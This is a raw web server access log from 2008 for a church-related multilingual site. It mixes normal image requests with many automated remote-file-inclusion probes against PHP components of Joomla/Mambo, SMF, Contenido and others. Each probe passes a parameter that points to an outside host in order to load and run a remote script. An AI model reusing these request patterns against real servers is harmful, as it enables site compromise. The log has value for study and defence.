66.249.66.66 - - [07/Sep/2008:04:03:04 -0400] "GET /robots.txt HTTP/1.1" 404 291
66.249.66.66 - - [07/Sep/2008:04:03:04 -0400] "GET /images/advtoday.gif HTTP/1.1" 304 -
72.21.63.234 - - [07/Sep/2008:04:03:11 -0400] "GET /log/sdaglobal.org-error_log.1/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 382
72.21.63.234 - - [07/Sep/2008:04:03:12 -0400] "GET /log/sdaglobal.org-error_log.1/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 382
118.166.53.160 - - [07/Sep/2008:04:04:13 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
87.230.21.231 - - [07/Sep/2008:04:04:27 -0400] "GET /log/sdaglobal.org-access_log.1//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 349
87.230.21.231 - - [07/Sep/2008:04:04:28 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 318
87.230.21.231 - - [07/Sep/2008:04:04:28 -0400] "GET /log//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 322
92.10.107.226 - - [07/Sep/2008:04:04:54 -0400] "GET / HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:55 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:55 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:55 -0400] "GET /images/welcome.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:55 -0400] "GET /images/select.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:56 -0400] "GET /images/english.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:56 -0400] "GET /images/chinese.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:56 -0400] "GET /images/china.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:56 -0400] "GET /images/czech.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:56 -0400] "GET /images/filipino.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:57 -0400] "GET /images/france.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:57 -0400] "GET /images/germany.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:57 -0400] "GET /images/hungary.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:57 -0400] "GET /images/india.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:57 -0400] "GET /images/italy.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:58 -0400] "GET /images/japan.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:58 -0400] "GET /images/korea.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:58 -0400] "GET /images/nepal.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:58 -0400] "GET /images/portugal.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:58 -0400] "GET /images/russia.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:58 -0400] "GET /images/spain.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:59 -0400] "GET /images/sweden.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:59 -0400] "GET /images/thailand.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:59 -0400] "GET /images/vietnam.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:04:59 -0400] "GET /images/3abn.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:00 -0400] "GET /images/vop.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:00 -0400] "GET /images/bibsab.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:02 -0400] "GET /images/hopeint.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:02 -0400] "GET /images/amazfact.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:02 -0400] "GET /images/iiw.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:02 -0400] "GET /images/amazdisc.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:03 -0400] "GET /images/promesy.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:03 -0400] "GET /images/omega.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:03 -0400] "GET /images/bibplus.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:03 -0400] "GET /images/hopetalk.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:03 -0400] "GET /images/knowjes.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:04 -0400] "GET /images/teachart.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:04 -0400] "GET /images/gawake.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:04 -0400] "GET /images/crusade.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:04 -0400] "GET /images/coming.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:04 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:05 -0400] "GET /images/voh.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:05 -0400] "GET /images/nimenqu.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:05 -0400] "GET /images/lamb.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:05 -0400] "GET /images/lamp.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:05 -0400] "GET /images/tempcat.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:05 -0400] "GET /images/biblight.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:06 -0400] "GET /images/lgtbearer.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:06 -0400] "GET /images/bibuniv.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:07 -0400] "GET /images/newstart.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:07 -0400] "GET /images/fuyinchina.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:08 -0400] "GET /images/ligtlife.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:08 -0400] "GET /images/bibleinfo.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:09 -0400] "GET /images/revival.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:09 -0400] "GET /images/gcclub.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:10 -0400] "GET /images/ellenwhite.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:10 -0400] "GET /images/24seven.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:11 -0400] "GET /images/wrlcrisis.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:11 -0400] "GET /images/advtoday.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:12 -0400] "GET /images/sign.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:12 -0400] "GET /images/shenyang.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:13 -0400] "GET /images/anxiyuan.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:13 -0400] "GET /images/creatn.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:13 -0400] "GET /images/zjjs.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:13 -0400] "GET /images/garhvn.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:13 -0400] "GET /images/truth7.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:14 -0400] "GET /images/region.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:14 -0400] "GET /images/gce.jpg HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:14 -0400] "GET /images/twchurch.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:14 -0400] "GET /images/kowloon.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:14 -0400] "GET /images/bayview.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:15 -0400] "GET /images/taipei.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:15 -0400] "GET /images/auccf.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:15 -0400] "GET /images/hacienda.gif HTTP/1.1" 304 -
92.10.107.226 - - [07/Sep/2008:04:05:16 -0400] "GET /favicon.ico HTTP/1.1" 404 292
63.247.141.8 - - [07/Sep/2008:04:06:18 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_abhttp://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 348
63.247.141.8 - - [07/Sep/2008:04:06:18 -0400] "GET /log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_abhttp://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 352
66.103.128.44 - - [07/Sep/2008:04:06:54 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 317
66.103.128.44 - - [07/Sep/2008:04:06:55 -0400] "GET /log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 321
213.218.137.36 - - [07/Sep/2008:04:07:07 -0400] "GET /log/sdaglobal.org-access_log.1//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 349
213.218.137.36 - - [07/Sep/2008:04:07:08 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 318
213.218.137.36 - - [07/Sep/2008:04:07:08 -0400] "GET /log//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 322
213.218.137.36 - - [07/Sep/2008:04:11:32 -0400] "GET /log/sdaglobal.org-error_log.3//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 348
59.106.19.213 - - [07/Sep/2008:04:11:51 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 312
194.0.200.9 - - [07/Sep/2008:04:13:51 -0400] "GET /log/sdaglobal.org-error_log.3//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 348
66.90.81.8 - - [07/Sep/2008:04:15:15 -0400] "GET //&mosConfig_absolute_path=http://www.der-blaue-reiter.de//contenido/images/bid.txt?? HTTP/1.1" 404 367
66.90.81.8 - - [07/Sep/2008:04:15:15 -0400] "GET /log//&mosConfig_absolute_path=http://www.der-blaue-reiter.de//contenido/images/bid.txt?? HTTP/1.1" 404 371
87.230.21.231 - - [07/Sep/2008:04:16:23 -0400] "GET /log/sdaglobal.org-error_log.3//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 348
69.10.136.171 - - [07/Sep/2008:04:18:26 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 315
78.83.255.201 - - [07/Sep/2008:04:18:51 -0400] "GET /modules/My_eGallery/index.php?basepath=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 310
78.83.255.201 - - [07/Sep/2008:04:18:51 -0400] "GET /log/modules/My_eGallery/index.php?basepath=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 314
66.103.128.44 - - [07/Sep/2008:04:22:06 -0400] "GET //cms/modules/form.lib.php?sourceFolder=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 306
66.103.128.44 - - [07/Sep/2008:04:22:08 -0400] "GET /log//cms/modules/form.lib.php?sourceFolder=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 310
72.55.156.116 - - [07/Sep/2008:04:26:04 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 314
72.55.156.116 - - [07/Sep/2008:04:26:05 -0400] "GET //modules/xfsection/modify.php?dir_module=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 310
72.55.156.116 - - [07/Sep/2008:04:26:10 -0400] "GET /log/sdaglobal.org-access_log.1//modules/xfsection/modify.php?dir_module=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 341
72.55.156.116 - - [07/Sep/2008:04:26:14 -0400] "GET /log/sdaglobal.org-error_log.4//modules/xfsection/modify.php?dir_module=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 340
72.55.156.116 - - [07/Sep/2008:04:26:23 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 350
72.55.156.116 - - [07/Sep/2008:04:26:23 -0400] "GET /log//components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 323
72.55.156.116 - - [07/Sep/2008:04:26:23 -0400] "GET //components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 319
72.55.156.116 - - [07/Sep/2008:04:26:48 -0400] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 348
72.55.156.116 - - [07/Sep/2008:04:30:02 -0400] "GET /log/sdaglobal.org-error_log.4%20//modules/xfsection/modify.php?dir_module=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 341
74.200.202.37 - - [07/Sep/2008:04:31:06 -0400] "GET /?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 200 9432
74.200.202.37 - - [07/Sep/2008:04:31:06 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 310
74.200.202.37 - - [07/Sep/2008:04:31:06 -0400] "GET /log/?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 200 57800
78.129.138.76 - - [07/Sep/2008:04:32:33 -0400] "GET /log/sdaglobal.org-access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 354
78.129.138.76 - - [07/Sep/2008:04:32:33 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 325
78.129.138.76 - - [07/Sep/2008:04:32:33 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 329
78.129.138.76 - - [07/Sep/2008:04:32:37 -0400] "GET /log/sdaglobal.org-access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 354
78.129.138.76 - - [07/Sep/2008:04:32:37 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 325
78.129.138.76 - - [07/Sep/2008:04:32:37 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 329
72.55.156.116 - - [07/Sep/2008:04:33:12 -0400] "GET /log/sdaglobal.org-access_log.1//admin/spaw/spaw_control.class.php?spaw_root=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 346
72.55.156.116 - - [07/Sep/2008:04:33:12 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 315
72.55.156.116 - - [07/Sep/2008:04:33:12 -0400] "GET /log//admin/spaw/spaw_control.class.php?spaw_root=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 319
72.55.156.116 - - [07/Sep/2008:04:33:12 -0400] "GET /log/sdaglobal.org-access_log//admin/spaw/spaw_control.class.php?spaw_root=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 344
63.247.141.8 - - [07/Sep/2008:04:33:15 -0400] "GET /log//update/update2.php?lang=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 304
63.247.141.8 - - [07/Sep/2008:04:33:15 -0400] "GET //update/update2.php?lang=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 300
78.83.255.201 - - [07/Sep/2008:04:34:19 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 328
78.83.255.201 - - [07/Sep/2008:04:34:20 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 332
78.129.138.76 - - [07/Sep/2008:04:35:56 -0400] "GET /log/sdaglobal.org-error_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 353
78.129.138.76 - - [07/Sep/2008:04:35:58 -0400] "GET /log/sdaglobal.org-error_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 353
74.200.202.37 - - [07/Sep/2008:04:36:20 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 312
118.169.162.221 - - [07/Sep/2008:04:36:56 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
65.55.208.235 - - [07/Sep/2008:04:37:21 -0400] "GET /mirror.htm HTTP/1.1" 304 -
88.116.96.124 - - [07/Sep/2008:04:39:14 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 291
66.103.131.81 - - [07/Sep/2008:04:41:38 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 310
66.103.131.81 - - [07/Sep/2008:04:41:38 -0400] "GET /?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 9432
66.103.131.81 - - [07/Sep/2008:04:41:38 -0400] "GET /log/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 57821
74.200.202.37 - - [07/Sep/2008:04:42:22 -0400] "GET /log/sdaglobal.org-access_log.1//modules/My_eGallery/public/displayCategory.php?basepath=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 359
74.200.202.37 - - [07/Sep/2008:04:42:22 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 328
74.200.202.37 - - [07/Sep/2008:04:42:23 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 332
78.83.255.201 - - [07/Sep/2008:04:42:46 -0400] "GET /?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 9432
78.83.255.201 - - [07/Sep/2008:04:42:47 -0400] "GET /log/?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 57824
195.199.190.37 - - [07/Sep/2008:04:43:33 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 310
195.199.190.37 - - [07/Sep/2008:04:43:33 -0400] "GET /?sourcedir=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 9432
195.199.190.37 - - [07/Sep/2008:04:43:33 -0400] "GET /log/?sourcedir=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 57824
69.41.180.138 - - [07/Sep/2008:04:43:58 -0400] "GET /log/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 295
69.41.180.138 - - [07/Sep/2008:04:43:58 -0400] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 291
85.25.129.240 - - [07/Sep/2008:04:44:40 -0400] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 291
85.25.129.240 - - [07/Sep/2008:04:44:40 -0400] "GET /log/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 295
82.79.231.103 - - [07/Sep/2008:04:45:00 -0400] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 291
82.79.231.103 - - [07/Sep/2008:04:45:00 -0400] "GET /log/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 295
85.25.150.230 - - [07/Sep/2008:04:45:08 -0400] "GET /log/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 295
85.25.150.230 - - [07/Sep/2008:04:45:08 -0400] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 291
202.181.105.117 - - [07/Sep/2008:04:46:35 -0400] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 291
202.181.105.117 - - [07/Sep/2008:04:46:36 -0400] "GET /log/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:04:46:36 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 322
205.211.11.1 - - [07/Sep/2008:04:46:37 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
205.211.11.1 - - [07/Sep/2008:04:46:37 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:04:46:40 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 322
205.211.11.1 - - [07/Sep/2008:04:46:40 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
205.211.11.1 - - [07/Sep/2008:04:46:40 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:04:46:42 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 320
205.211.11.1 - - [07/Sep/2008:04:46:45 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 320
66.103.131.81 - - [07/Sep/2008:04:46:52 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 312
205.211.11.1 - - [07/Sep/2008:04:48:21 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
72.55.156.116 - - [07/Sep/2008:04:48:31 -0400] "GET /log/sdaglobal.org-error_log//faqsupport/samplefaqsupport.php?path[docroot]=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 341
72.55.156.116 - - [07/Sep/2008:04:48:31 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 313
72.55.156.116 - - [07/Sep/2008:04:48:31 -0400] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 317
72.55.156.116 - - [07/Sep/2008:04:48:41 -0400] "GET /log/sdaglobal.org-error_log.3//faqsupport/samplefaqsupport.php?path[docroot]=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 343
69.42.221.130 - - [07/Sep/2008:04:48:46 -0400] "GET /log/sdaglobal.org-error_log.3/errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 321
69.42.221.130 - - [07/Sep/2008:04:48:47 -0400] "GET /errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 291
69.42.221.130 - - [07/Sep/2008:04:48:47 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 295
69.42.221.130 - - [07/Sep/2008:04:49:00 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 321
203.22.204.92 - - [07/Sep/2008:04:49:13 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promislovik.ru/forum/team.txt?? HTTP/1.1" 404 339
203.22.204.92 - - [07/Sep/2008:04:49:13 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promislovik.ru/forum/team.txt?? HTTP/1.1" 404 335
205.211.11.1 - - [07/Sep/2008:04:49:42 -0400] "GET /log/sdaglobal.org-error_log.3/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 321
205.211.11.1 - - [07/Sep/2008:04:49:42 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
205.211.11.1 - - [07/Sep/2008:04:49:42 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:04:49:57 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 321
217.128.122.28 - - [07/Sep/2008:04:50:30 -0400] "GET /?sourcedir=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 200 9432
217.128.122.28 - - [07/Sep/2008:04:50:30 -0400] "GET /log/?sourcedir=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 200 57824
205.211.11.1 - - [07/Sep/2008:04:51:00 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
205.211.11.1 - - [07/Sep/2008:04:51:04 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
89.7.246.172 - - [07/Sep/2008:04:51:13 -0400] "GET /favicon.ico HTTP/1.1" 404 292
89.7.246.172 - - [07/Sep/2008:04:51:14 -0400] "GET /favicon.gif HTTP/1.1" 404 292
93.174.93.220 - - [07/Sep/2008:04:52:55 -0400] "GET / HTTP/1.1" 200 9432
69.42.221.130 - - [07/Sep/2008:04:53:41 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 295
69.42.221.130 - - [07/Sep/2008:04:53:41 -0400] "GET /errors.php?error=http://waktu.hut2.ru/sca/id.txt? HTTP/1.1" 404 291
203.146.102.38 - - [07/Sep/2008:04:55:01 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 322
203.146.102.38 - - [07/Sep/2008:04:55:02 -0400] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 291
203.146.102.38 - - [07/Sep/2008:04:55:03 -0400] "GET /log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:04:55:17 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:04:55:17 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
